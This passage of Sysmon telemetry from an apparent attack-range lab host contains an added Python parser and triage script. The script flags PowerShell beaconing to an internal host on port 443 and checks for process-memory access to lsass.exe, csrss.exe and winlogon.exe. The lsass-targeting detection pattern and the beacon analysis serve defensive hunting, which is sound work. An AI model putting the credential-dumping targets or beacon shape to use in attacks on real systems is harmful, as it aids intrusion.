Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEB2632C7B0D4A7003B4D889FBE6C08E,SHA256=9C8F78EC505E449593807BDE849E83827D8BEAAF643FB93506D9E22D9ED9B6CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:14.152{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12FEB9EC8329044DC1867D33E42E4F7D,SHA256=B3C49E182AE5D5C4A7FA5E4A109D90040A7395C5FD84FE6EE7F83C803AFE2362,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:40.051{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56641-false10.0.1.12-8000- 23542300x800000000000000035084714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:15.170{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47C1F0E2765DA4BD56D1C7148CF6A53,SHA256=883ECF67990D652D5B74E640DE4DFA4F45531DE1B340CE1A88AA5A6E0D5D3E0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:16.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79F9FB669C95DECA3AE16234BF71AB61,SHA256=02BB19BB9C965D4E49E3B94F3F6268549C63A8130E6C4EC033D5AD97CD10DEA7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:17.231{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F9DC304478F6B16EF0B4153D4413D849,SHA256=C64FC31E9D6AFFFC9C597C2EDE17D1DC45095E4E0CA81D3550B4045ED07A1D86,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
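The records above are Sysmon XML events with the tags stripped, so each event's System header (EventID, Version, Level, Task, Opcode, Keywords, EventRecordID, Channel, Computer, Security UserID) and its EventData values run together without delimiters. The following parser and triage pass is an added example, not part of the original export and not Splunk or Sysmon code. It recovers fields from the tokens that remain distinguishable (Sysmon sets Task equal to EventID, Keywords is the fixed 0x8000000000000000, images end in ".exe", GUIDs are braced) and then applies two checks that the visible data supports: outbound connections made by powershell.exe under an interactive domain account (Event 3) and FileDelete events whose archive step failed (Event 23, "false - insufficient disk space"). Assumptions are labelled in the code: the lone "-" after the computer name is read as an empty Security UserID, the fused SourceProcessId/SourceThreadId of Event 10 is kept as one field rather than guessed apart, and the list of sensitive Event 10 targets is illustrative and does not come from this dump. The four sample records are copied verbatim from the lines above.

```python
"""Parse the flattened Sysmon records in this dump and triage them.

Added example, not part of the original export. The System header and the
EventData values run together with no delimiters; the regexes below recover
fields from the tokens that are still distinguishable (Task == EventID,
fixed Keywords, ".exe" suffixes, braced GUIDs).
"""
import re

CHANNEL = "Microsoft-Windows-Sysmon/Operational"
HEADER = re.compile(                        # Task repeats EventID, which tells "10" apart from "1"
    r"^(?P<eid>\d+)(?P<ver>\d)(?P<lvl>\d)(?P=eid)(?P<op>\d)"
    r"(?P<kw>0x[0-9A-Fa-f]{16})(?P<rec>\d+)" + re.escape(CHANNEL) +
    r"(?P<computer>.+?)-"                   # assumption: the "-" is an empty Security UserID
    r"(?P<utc>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})(?P<body>.*)$", re.S)
IP, HOST, EXE = r"\d{1,3}(?:\.\d{1,3}){3}", r"-|[A-Za-z][A-Za-z0-9.-]*?", r"[A-Za-z]:\\.+?\.exe"
# EventData in Sysmon schema order for the three event types present in the dump.
NET = re.compile(                           # Event 3, NetworkConnect
    rf"^\{{(?P<guid>[0-9A-F-]+)\}}(?P<pid>\d+)(?P<image>{EXE})(?P<user>.+?)"
    rf"(?P<proto>tcp|udp)(?P<initiated>true|false)(?P<sipv6>true|false)"
    rf"(?P<sip>{IP})(?P<shost>{HOST})(?P<sport>\d{{1,5}})(?P<sportname>-|[a-z]+)"
    rf"(?P<dipv6>true|false)(?P<dip>{IP})(?P<dhost>{HOST})(?P<dport>\d{{1,5}})(?P<dportname>-|[a-z]+)\s*$")
DEL = re.compile(                           # Event 23, FileDelete
    rf"^\{{(?P<guid>[0-9A-F-]+)\}}(?P<pid>\d+)(?P<user>.+?)(?P<image>{EXE})(?P<target>[A-Za-z]:\\.+?)"
    r"(?P<hashes>MD5=[0-9A-F]+,SHA256=[0-9A-F]+,IMPHASH=[0-9A-F]+)(?P<isexe>true|false)(?P<archived>.+?)\s*$", re.S)
ACC = re.compile(                           # Event 10, ProcessAccess; source pid and tid are fused, kept as one field
    rf"^\{{(?P<sguid>[0-9A-F-]+)\}}(?P<spid_tid>\d+)(?P<simage>{EXE})\{{(?P<tguid>[0-9A-F-]+)\}}(?P<tpid>\d+)"
    rf"(?P<timage>{EXE})(?P<access>0x[0-9a-fA-F]+?)(?P<trace>[A-Za-z]:\\.*?)\s*$", re.S)
BODY = {"3": NET, "23": DEL, "10": ACC}


def split_records(dump: str) -> list[str]:
    """Split a run of records on the whitespace that precedes the next System header."""
    return [p for p in re.split(r"\s+(?=\d+0x[0-9A-Fa-f]{16}\d+" + re.escape(CHANNEL) + ")", dump.strip()) if p]


def parse_record(rec: str) -> dict:
    """Header fields for any record, plus EventData fields for the known event types."""
    m = HEADER.match(rec)
    if m is None:
        raise ValueError("not a flattened Sysmon record: " + rec[:40])
    out = {k: m.group(k) for k in ("eid", "rec", "computer", "utc")}
    body = BODY.get(out["eid"])
    bm = body.match(m.group("body")) if body else None
    if bm:
        out.update(bm.groupdict())
    return out


PROCESS_RIGHTS = {                          # PROCESS_* rights plus the standard rights in the high word
    0x1: "TERMINATE", 0x2: "CREATE_THREAD", 0x8: "VM_OPERATION", 0x10: "VM_READ", 0x20: "VM_WRITE",
    0x40: "DUP_HANDLE", 0x80: "CREATE_PROCESS", 0x100: "SET_QUOTA", 0x200: "SET_INFORMATION",
    0x400: "QUERY_INFORMATION", 0x800: "SUSPEND_RESUME", 0x1000: "QUERY_LIMITED_INFORMATION",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE"}


def decode_access(mask: str) -> list[str]:
    """Expand a GrantedAccess mask such as 0x1fffff into right names."""
    value = int(mask, 16)
    return [name for bit, name in PROCESS_RIGHTS.items() if value & bit]


SYSTEM = r"NT AUTHORITY\SYSTEM"
SENSITIVE = (r"\lsass.exe", r"\csrss.exe", r"\winlogon.exe")   # illustrative target list, not from the dump
MEMORY = 0x8 | 0x10 | 0x20                  # VM_OPERATION | VM_READ | VM_WRITE


def triage(records: list[dict]) -> list[str]:
    """One finding per record worth a look; the forwarder's own traffic and handles are left alone."""
    findings = []
    for r in records:
        if r["eid"] == "3" and r.get("image", "").lower().endswith(r"\powershell.exe") and r.get("user") != SYSTEM:
            findings.append(f"{r['utc']} rec {r['rec']}: powershell.exe as {r['user']} -> {r['dip']}:{r['dport']} ({r['dportname']})")
        elif r["eid"] == "23" and r.get("archived", "").startswith("false"):
            findings.append(f"{r['utc']} rec {r['rec']}: FileDelete archive failed ({r['archived']}) for {r['target']}")
        elif r["eid"] == "10" and r.get("timage", "").lower().endswith(SENSITIVE) and int(r.get("access", "0"), 16) & MEMORY:
            findings.append(f"{r['utc']} rec {r['rec']}: {r['simage']} opened {r['timage']} with {decode_access(r['access'])}")
    return findings


# Four records copied verbatim from the dump above, joined the way the dump joins them.
SAMPLE = " ".join([
    r"354300x800000000000000035084676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:27.142"
    r"{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDT"
    r"tcptruefalse10.0.1.15win-host-987.attackrange.local56636-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"23542300x800000000000000035084675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:02.157"
    r"{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"
    r"C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational"
    r"MD5=D6199401B440E8C1C4EDDD322B695ACE,SHA256=C2609986ED3C0AFAC6236C186DC49A6ABB46DCFE4A5313F36926354259D75EA7,"
    r"IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space",
    r"10341000x800000000000000035084710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:13.983"
    r"{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E7D-613A-4490-03000000C801}332"
    r"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|"
    r"C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|"
    r"C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781",
    r"354300x800000000000000035084679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.097"
    r"{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"
    r"NT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56637-false10.0.1.12-8000-",
])

if __name__ == "__main__":
    for line in triage([parse_record(r) for r in split_records(SAMPLE)]):
        print(line)
```

Run against the four sample records, triage reports two things and stays quiet on the rest. The powershell.exe connection is the one that matters for hunting: ATTACKRANGE\REED_SCHMIDT's process (GUID ...-4822-613A-788F-...) reaches 10.0.1.16:443 at 18:12:27, :33, :38 and :42 with source ports incrementing one at a time, which is the shape of a short-interval beacon and worth pivoting on by ProcessGuid into the Event 1 and PowerShell operational logs. The Event 23 finding is a pipeline-health problem rather than an attack: Archived reads "false - insufficient disk space", so Sysmon's FileDelete archive is not retaining deleted files, and the target here is the forwarder's own WinEventLog checkpoint file being rewritten every second, so both freeing the archive volume and excluding that path from the FileDelete rule are in order. The conhost.exe to splunk-MonitorNoHandle.exe Event 10 carries 0x1fffff (PROCESS_ALL_ACCESS) but is a child-process handle at launch and is not flagged because the target is not in the sensitive list.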
23542300x800000000000000035084717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:17.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C596248B0047AE7EE1E06CF095DD3061,SHA256=650381EA4F559F65448F117252644C34F31950F2C8E37CC0B985515199E0217D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:42.205{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56642-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:18.216{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CE6CEC6D48AA80F2D98E767ADE5491,SHA256=2856B08B04A6FDD36A8F1166780B6CEE41B4E2039CA0D15119FABBD2321769DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:19.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA5B8385C4BA593F3E5B0EB1E5D1DF1,SHA256=D35F1DB8B664D2C8C77F7F951118D5837B4C8AAB7B33BEBFF2CC308E58505BD3,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000035084723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:45.089{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56643-false10.0.1.12-8000- 23542300x800000000000000035084722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:20.267{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0455F10F8D7B4D532B31641EBD234F53,SHA256=FE1F8DDC81D4D516279696127B6702C502649EC953349D97D46DC2281EB2F56A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:21.312{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AC9962669DD35A1FB57C1E34C8265B3A,SHA256=BB11B9636B45C0D889EF6E4B8B0E8691AFC57FCF584A4D2822D0FE80D8BB383F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:21.281{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B173987E75EA2182D3085B5F0ACED8A,SHA256=ADCB358626906AC4AA3E255AD2E7899EC6232FA8B6A2BF4EF5E3C21492C95871,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:46.219{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56644-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:22.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3938E3B9B1047494B2C59E6BED5FE2C,SHA256=456BB290D8BBD61A6A0F9FC51A7FF010FF1D10CE2DD1BBB82E13CF83E09C7125,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:23.347{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6EABAB1F071A90A18E08BF17F1EC8EF,SHA256=00B3F9D3CF625501FE8CD9D0591431FDFDE913796C53E21891CF450C20F4ACD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:24.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F7D6FDFFA16F105829989585F6938C,SHA256=4858A22EBBB2DE8C7BC99AD8B16209BD36403841F649F7084BB958E976980B98,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.163{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56645-false10.0.1.12-8000- 23542300x800000000000000035084731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:25.380{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4B18AEF51FA2D28F01E1D665804167D,SHA256=BBE766FD8DE714ED03D914DD95C3CD318F64DD9B7CF0927864B7A400DC544338,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:25.227{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=75EFEF9C1FA4ED06933E9D96DD210AC0,SHA256=F28CB3ABC02EE521BDA232E251E6DAA48A412B8BE91806759BB65700B7FCC42D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:26.394{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82C0B1B20223559A373FFF13AC66347A,SHA256=5942DBDDFA53FC2D41EE0162BCB731443C441014D60C8924ACED20D4A624B1E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:27.409{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4A97B7D6069A02A1AD64E7F910DE701,SHA256=EEA8C1AE791CDAC6BF81D584949616859E8F1B78466440C44B8871FB2942BA0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:50.233{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56646-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035084753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.843{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.841{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:28.841{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.840{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.826{B81B27B7-4E8C-613A-4690-03000000C801}5256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
